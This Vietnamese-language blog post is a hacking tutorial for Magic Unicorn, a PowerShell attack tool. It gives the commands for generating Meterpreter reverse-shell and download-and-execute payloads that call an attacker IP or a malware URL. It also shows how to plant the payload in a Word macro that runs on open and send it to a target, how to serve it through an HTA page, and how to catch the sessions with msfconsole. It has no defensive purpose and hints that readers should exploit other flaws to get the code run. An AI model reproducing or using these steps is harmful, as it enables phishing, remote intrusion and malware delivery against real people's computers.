Magic Unicorn - Công cụ tấn công PowerShell - Thekalitools.com

Monday, September 11, 2017

Magic Unicorn - Công cụ tấn công PowerShell

Có một công cụ hacking của TrustedSec mà mình đã có giới thiệu trước đây, và được nằm trong Top 10 Security Tools của Kali Linux, đó chính là SET - Social Engineering Toolkit. Hôm nay mình muốn giới thiệu đến các bạn công cụ Magic Unicorn cũng được phát triển bởi TrustedSec.
Magic Unicorn - Kỳ lân thần kỳ =))

Giới thiệu về Magic Unicorn:

Magic Unicorn là một công cụ đơn giản dùng để tấn công PowerShell của Windows và tiêm shellcode thẳng vào bộ nhớ. Công cụ được phát triển dựa trên kỹ thuật tấn công PowerShell của Matthew Graeber, kỹ thuật bypass (vượt qua) bảo mật của PowerShell của David Kennedy (TrustedSec) và Josh Kelly đưa ra tại hội nghị Defcon 18.
Một chút thông tin về Defcon: Defcon là hội nghị hacker lớn nhất thế giới được tổ chức thường niên (mỗi năm một lần) tại Las Vegas, bang Nevada - Mỹ. Ấy vây mà vào năm 2013 vì vụ đình đám của hacker Edward Snowden mà đại diện của chính phủ Mỹ (thường là CIA) không được mời tham dự hội nghị này. Các bạn cũng có thể xem lại thông tin của hội nghị này tại trang www.defcon.org.
Cách sử dụng rất đơn giản, chỉ cần chạy Magic Unicorn (đảm bảo rằng Metasploit đã được cài đặt) và Magic Unicorn sẽ tự động tạo ra lệnh PowerShell mà bạn cần chỉ cần tìm cách chạy được đoạn mã này trên máy tính mục tiêu là bạn đã "hack" thành công.

Hướng dẫn sử dụng Magic Unicorn:

Cấu trúc lệnh: 

[[mcode]]$ python unicorn.py <payload> <reverse_ipaddr> <port> [optional hta or macro, crt]

Sau đây là một vài ví dụ:

Tấn công tiêm nhiễm PowerShell:

Khởi chạy payload Meterpreter:
- Địa chỉ IP máy attacker: 192.168.1.5
- Cổng sử dụng: 443
- Payload sử dụng: windows/meterpreter/reverse_tcp
[[mcode]]$ python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Khởi chạy payload Down/Exec (tải về và thực thi):

- Payload sử dụng: windows/download_exec
- Liên kết tải malware: http://example.com/malware.exe
- Tên chương trình muốn giả mạo: test.exe
[[mcode]]$ python unicorn.py windows/download_exec exe=test.exe url=http://example.com/malware.exe[[ecode]]
Sau khi chạy chương trình sẽ xuất ra 2 tập tin là powershell_attack.txt và unicorn.rc. Điều tiếp theo bạn cần làm là thực thi đoạn code trong tập tin powershell_attack.txt trên máy tính mục tiêu.
Và chạy câu lệnh sau để chạy một ứng dụng bắt dữ liệu:
[[mcode]]$ msfconsole -r unicorn.rc
Note: Và để làm được điều này bạn cần phải dùng một số thủ thuật để thực thi từ xa. Thường thì sẽ thực hiện bằng cách lợi dụng các lỗ hỏng của chương trình khác. 
P.s: Chỗ này các bạn hãy tự suy nghĩ thêm nhé ;)

Tấn công qua Macro:

Đơn giản thôi, nếu muốn tạo một đoạn mã để tấn công qua Macro thay vì PowerShell ta chỉ cần thêm tùy chọn [[scode]]macro[[escode]] ở cuối câu lệnh, ta sử dụng lại ví dụ 1:
[[mcode]]$ python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 macro

Note: Trong kiểu tấn công Macro, ta cần một tập tài liệu Word chẳng hạn, sau đó hãy thực hiện như sau: File, Properties, Ribbons, và chọn Developer. Sau khi làm như vậy, sẽ có một cửa sổ Developer hiện lên. Hạy chọn tạo một macro mới, sử dụng hàm Auto_Open() (hoặc hàm AutoOpen() đối với MS Office 2016) và dán đoạn code ta có được sau khi chạy Magic Unicorn vào đấy. Sau đó gửi cho mục tiêu.

Tấn công HTA:

Tương tự đối với cách tấn công HTA, ta hãy thêm tùy chọn [[scode]]hta[[escode]] và cuối câu lệnh:
[[mcode]]$ python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443 hta
Lần này chương trình sẽ xuất ra 3 tập tin, đó là index.html, Launcher.hta và unicorn.rc.
Note: Việc bạn cần làm là đưa 2 tệp tin index.html và Launcher.hta lên máy chủ website, và cho chạy unicorn.rc (chạy thế nào xem lại ở trên).

Lời kết:

Ngoài ra thì chương trình Magic Unicorn còn các kiểu tấn công khác như CERUTIL Attack, Custom PS1 Attack, ... nếu muốn các bạn có thể tự tìm hiểu thêm nhé! Magic Unicorn mang đến cho ta rất nhiều kiểu tấn công, nhưng tất cả chỉ dựa trên nguyên tắc là tấn công vào PowerShell.

No comments:

Post a Comment